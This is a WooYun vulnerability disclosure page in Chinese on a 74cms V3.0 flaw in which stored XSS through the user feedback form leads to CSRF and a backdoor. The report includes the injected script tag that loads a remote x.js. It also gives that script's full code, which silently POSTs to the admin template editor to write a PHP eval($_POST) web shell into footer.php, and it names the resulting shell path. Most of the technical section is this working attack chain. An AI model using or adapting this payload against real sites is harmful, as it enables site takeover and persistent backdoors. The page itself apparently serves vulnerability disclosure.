漏洞概要 关注数(3) 关注此漏洞
缺陷编号: WooYun-2011-03071
漏洞标题: 骑士CMS(74cms) CSRF 后台 getshell
相关厂商: 骑士CMS(74cms)
漏洞作者: 路人甲
提交时间: 2011-10-21 19:16
公开时间: 2011-10-21 20:27
漏洞类型: CSRF
危害等级: 高
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org
Tags标签: 模板文件操作参数未过滤 后台xss
漏洞详情
披露状态:
2011-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
官方网站:http://**.**.**.**/
影响版本:74cms V3.0.20110908
Author:insight
漏洞详细:
注册用户-->会员中心-->意见建议-->提交意见内容 1">1<script src="http://**.**.**.**/x.js"></script>1 --> 等待管理员登录
管理员登录-->查看 "待回复的意见/建议" --> .....
js内容:
var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6'; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); xml.open("POST",'admin_templates.php?act=do_edit',false); xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){}
shell地址:http://**.**.**.**/74cmsv3/templates/default/footer.php
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值